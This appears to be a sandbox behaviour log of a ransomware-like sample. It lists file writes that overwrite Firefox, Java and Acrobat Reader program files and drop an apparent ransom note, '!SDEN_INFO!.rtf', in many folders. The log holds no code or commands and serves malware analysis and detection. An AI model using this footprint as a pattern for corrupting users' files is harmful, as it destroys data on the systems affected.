| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\bg-BG\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\browser\features\e10srollout@mozilla.org.xpi | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\jp2launcher.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\browser\features\firefox@getpocket.com.xpi | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\hu-HU\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-CA\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\FillSign.aapp | size = 4101 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe | size = 61440 |
|
8 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-CA\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\hu-HU\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\TrackedSend.aapp | size = 1802 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\metadata.json | size = 1733 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\browser\features\firefox@getpocket.com.xpi | size = 61440 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\browser\features\firefox@getpocket.com.xpi | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\jp2launcher.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\browser\features\e10srollout@mozilla.org.xpi | size = 4096 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js | size = 1661 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\defaults\pref\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-ZA\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-ZA\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\rempl\Logs\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ar-sa\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\bg-BG\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ca-ES\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\de-AT\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-AU\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-CA\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-GB\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-IN\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-US\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-AR\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-MX\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fi-FI\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fi-FI\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\eu-ES\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-BE\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-XF\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\hu-HU\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\is-IS\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\nb-NO\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\pl-PL\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ru-RU\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\sv-SE\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\zh-HK\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\Logs\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\Back_0000_Hover.png | size = 2625 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\index.html | size = 1638 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\charsets.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\charsets.jar | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\charsets.jar | size = 8192 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\WindowsUpdatePrivacySetting.scale-200.png | size = 7273 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\jabswitch.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\jabswitch.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\minidump-analyzer.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\minidump-analyzer.exe | size = 61440 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\minidump-analyzer.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_de.properties | size = 4722 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ms-MY\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ms-MY\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\crashreporter.ini | size = 5419 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\Back_0001_Static.png | size = 2552 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\vi-VN\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\vi-VN\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\kinit.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\kinit.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_zh_TW.properties | size = 5168 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ro-RO\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ro-RO\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\servertool.exe | size = 5512 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\servertool.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\bin\servertool.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.007.etl | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.007.etl | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\zh-CN\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\zh-CN\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\uninstall\helper.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\uninstall\helper.exe | size = 61440 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\uninstall\helper.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\cmm\CIEXYZ.pf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\cmm\CIEXYZ.pf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\jfxrt.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\jfxrt.jar | size = 61440 |
|
8 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\jfxrt.jar | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_fr.properties | size = 4825 |
|
1 | |
| Write | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.008.etl | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.008.etl | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy\splash@2x.gif | size = 2456 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\fontconfig.bfc | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\fontconfig.bfc | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\fontconfig.bfc | size = 8192 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\softokn3.chk | size = 2315 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\fontconfig.bfc | size = 5186 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\hijrah-config-umalqura.properties | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\hijrah-config-umalqura.properties | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\cs-CZ\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\cs-CZ\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Exp_RHP.aapp | size = 1823 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_RHP.aapp | size = 1798 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Pages_R_RHP.aapp | size = 1819 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-ID\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-ID\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy\splash@2x.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\deploy\splash@2x.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\OptimizePDF_R_RHP.aapp | size = 1848 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-CO\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-CO\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ca-ES-valencia\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ca-ES-valencia\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\javaws.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\javaws.jar | size = 61440 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\javaws.jar | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\management\jmxremote.password.template | size = 4272 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\ext\meta-index | size = 2877 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\weblink.api | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\weblink.api | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaBrightDemiBold.ttf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaBrightDemiBold.ttf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\invalid32x32.gif | size = 1569 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-CH\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-CH\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-HK\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-HK\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-CL\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-CL\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\!SDEN_INFO!.rtf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\!SDEN_INFO!.rtf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\RTC.der | size = 2514 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-CA\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-CA\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_distributed.gif | size = 2029 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ja-JP\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ja-JP\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_sent.gif | size = 2325 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\!SDEN_INFO!.rtf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\!SDEN_INFO!.rtf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\jfr\default.jfc | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\jfr\default.jfc | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\stop_collection_data.gif | size = 2331 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\DarkTheme.acrotheme | size = 8275 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SaveAsRTF.api | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SaveAsRTF.api | size = 32768 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\nl-NL\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\nl-NL\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\management\snmp.acl.template | size = 4792 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\uninstall\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\cs-CZ\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-ID\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\nl-BE\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\nl-BE\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-ZA\!SDEN_INFO!.rtf | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-ZA\!SDEN_INFO!.rtf | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\PrivacyContentWrapper.min.js | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\PrivacyContentWrapper.min.js | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\lib\security\blacklisted.certs | size = 2669 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_144\LICENSE | size = 1456 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvSOFT.x3d | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvSOFT.x3d | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-114x114-precomposed.png | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-CO\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fi-FI\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ms-MY\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ro-RO\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\vi-VN\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\zh-CN\!SDEN_INFO!.rtf | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\create_form.gif | size = 2610 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\info.gif | size = 1994 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_same_reviewers.gif | size = 6189 |
|
1 | |
| Write | C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini | size = 2203 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\Lock-Confirmation-page-350.png | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\Lock-Confirmation-page-350.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\LICENSE.txt | size = 3107 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\sk-SK\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\sk-SK\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\cloud_icon.png | size = 2071 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\japanese_over.png | size = 1984 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\zh-TW\index.html | size = 5512 |
|
1 | |
| Write | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\zh-TW\index.html | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Accessibility.api | size = 5512 |
|
1 | |
